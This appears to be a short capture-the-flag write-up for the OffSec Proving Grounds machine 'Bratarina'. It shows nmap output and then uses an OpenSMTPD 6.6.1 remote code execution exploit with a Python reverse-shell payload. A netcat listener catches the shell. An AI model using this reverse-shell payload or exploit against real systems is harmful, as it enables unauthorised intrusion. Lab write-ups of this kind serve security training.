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Proving grounds Play: Bratarina |
post |
2023-10-05 02:00 |
true |
true |
Naveen |
Offsec proving grounds practice linux machine writeup |
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dbdd2cea2f85c589bcfce9a338f0d750 (RSA)
| 256 e3b765c2a78e4529bb62ec301aebed6d (ECDSA)
|_ 256 d55b795bce48d85746db594fcd455def (ED25519)
25/tcp open smtp OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The service OpenSMTPD is vulnerable to OpenSMTPD 6.6.1 - Remote Code Execution vulnerability.
naveenj@hackerspace:|22:38|~/proving_grounds/Bratarina/exploits$ python3 exploit.py 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
naveenj@hackerspace:|22:37|~/proving_grounds/Bratarina/exploits$ nc -lvnp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 34894
Foothold Obtained
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